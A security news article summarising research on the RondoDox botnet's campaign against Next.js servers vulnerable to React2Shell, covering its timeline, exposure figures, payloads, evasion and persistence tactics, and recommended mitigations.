RondoDox Botnet Targets 90K Servers via React2Shell

A botnet campaign active since March 2025 has added the React2Shell vulnerability to its arsenal, targeting over 90,000 exposed Next.js servers with cryptocurrency miners and Mirai-based malware. CloudSEK researchers published new analysis this week detailing RondoDox's nine-month evolution from reconnaissance to mass exploitation.

The Campaign Timeline

CloudSEK's research identifies three distinct operational phases:

March to April 2025 - Reconnaissance and vulnerability testing. The operators scanned for vulnerable web applications without deploying payloads, likely building target lists.

April to June 2025 - Automated web application exploitation. RondoDox began compromising systems but focused on persistence rather than aggressive payload deployment.

July 2025 to present - Large-scale IoT botnet deployment. The campaign shifted to mass exploitation with coinminers and DDoS capabilities.

The operators started scanning for vulnerable Next.js servers on December 8, 2025—just five days after the React2Shell vulnerability disclosure. By December 11, they were actively deploying botnet clients.

Scale of Exposure

Shadowserver Foundation data shows approximately 90,300 Next.js instances remain vulnerable to CVE-2025-55182 as of December 31, 2025. Geographic distribution:

Country	Vulnerable Instances
United States	68,400
Germany	4,300
France	2,800
India	1,500
Other	13,300

The U.S. dominance in vulnerable instances isn't surprising given the popularity of Next.js among American startups and enterprises. But it also means American organizations face disproportionate risk from RondoDox activity.

The Payloads

After compromising a server, RondoDox deploys multiple payloads from paths that suggest the operators have a sense of humor—or contempt for their targets:

• /nuts/poop - A coinminer designed to steal computing resources
• /nuts/bolts - Botnet loader and health checking component
• /nuts/x86 - A Mirai variant for DDoS and lateral movement

The malware demonstrates competitive behavior that's become common in botnet operations. It terminates rival coinminers, removes artifacts from previous attacks, and scrubs Docker-based payloads left by other threat actors. Every 45 seconds, it checks running processes and kills anything not on its whitelist—preventing reinfection by competitors while maintaining control.

Evasion Techniques

RondoDox stands out for its traffic mimicry capabilities. The botnet disguises command-and-control communications to look like gaming platform traffic or VPN connections. This makes detection through network monitoring more difficult, as security teams must distinguish malicious traffic from legitimate gaming or remote work activity.

Persistence comes through /etc/crontab modifications. The malware creates scheduled jobs that relaunch the botnet client if terminated, and it monitors for attempts to remove these entries.

Connection to Broader React2Shell Exploitation

We covered the React2Shell vulnerability's weaponization in ransomware campaigns last month. RondoDox represents a parallel threat—while ransomware operators use React2Shell for high-value targeted attacks, RondoDox pursues volume. The same vulnerability, different business models.

The vulnerability's severity makes this predictable. CVE-2025-55182 is an unauthenticated remote code execution flaw affecting default Next.js configurations. Applications created with create-next-app are immediately exploitable without code modifications. When 39% of cloud environments contain vulnerable instances (per Wiz Research), opportunistic botnets will inevitably follow disclosure.

Recommended Mitigations

Organizations running Next.js should:

1. Patch immediately - Update to patched React and Next.js versions. This is non-negotiable.
2. Segment IoT devices - Move IoT and development systems into dedicated VLANs with restricted outbound access
3. Deploy WAF rules - Block known React2Shell exploit patterns at the edge
4. Monitor for suspicious processes - Watch for unexpected cron jobs and processes communicating with unknown IPs
5. Block known C2 infrastructure - Add published IOCs to firewall blocklists

For development teams, this vulnerability is a reminder that framework updates aren't optional. The window between disclosure and mass exploitation continues to shrink—five days in this case.

See our malware guide for additional context on botnet operations and how to recognize signs of compromise.

The Persistence Problem

RondoDox has been active for nine months, adapting to new vulnerabilities as they emerge. This longevity suggests the operators are treating it as a business rather than a short-term campaign. They invest in maintenance, add new exploit capabilities, and actively defend their territory against competing botnets.

For security teams, this means remediation must be thorough. Patching the vulnerability isn't enough if the botnet already established persistence. The crontab modifications and process monitoring capabilities mean a compromised system needs full forensic analysis, not just a patch and a reboot.

The 90,000 vulnerable instances represent a target-rich environment. Even with security teams racing to patch, RondoDox operators have already had weeks to establish footholds. The question for many organizations isn't whether they're vulnerable—it's whether they were already compromised before they got around to patching.